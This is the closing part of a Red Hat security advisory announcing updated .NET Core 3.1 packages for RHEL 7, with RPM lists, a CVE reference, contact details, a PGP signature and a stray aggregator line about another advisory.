rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyInutzjgjWX9erEAQjThg/+MKqPc3jlUrNqUAS1LZhSCO6m0uW0uHeX  
XWJwV1fejIn8e2zo/DigEzqjDtXMAB8hizNNJbZJcubq/3o51WM2MWJOl/At8yIm  
zoAYuPOu+DmKbfWvHWQs/FrUMB4zyNXqmLWOZ1D0A7jf8ua7CJxJOtAdmm78uBFz  
EblFEzpNykOMsfWCvJJJ//NivHPlxiaQsS6P5oBFzlErSwHKFzjNpmpiErw4SA1T  
Z5GZSTpSBTrLKfjS1ZGV1tVAXMifISZbZUqg4NAbra6Zf2gfkyYs2wsRyn3fJ+JH  
o0aVY76ANHu3g98hW/Ng3T0ET9edLGOTAz15X4VX5DuFBqHTQFoKOEaDF/nZsN//  
a3eFpGRr4AQ1w8q+dWE20gzlr7o1w65Q1ltdsgXfqxrehLn1ApXIiWlhyoCWXxiW  
kqvicwdOdjJDK56MeZnFu6CjCGZqnR61WuZjbPqBty/Rkl2rHej4KFL2Q7s0CbQU  
Dh4hFEov9ZL2Qx7pCzYrk9G2RB7ljWfw+9vE4UP2FEiwgCK5qKxbmlkQbggULQxQ  
A6YGpvj/KamjagCktrnRC3BWEw8O1ulJChqR5TnllKt9+yunpKVJaVfOyAJNOVi7  
JHrYj9JN/v2H98dmzNstrgJNDD/ePy0HZARTi/gMc06pPZoncpE+vedXMEJsUplM  
uKQk6IAD4Go=WeAO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6522-01

Red Hat Security Advisory 2022-6518-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.

Tag

#js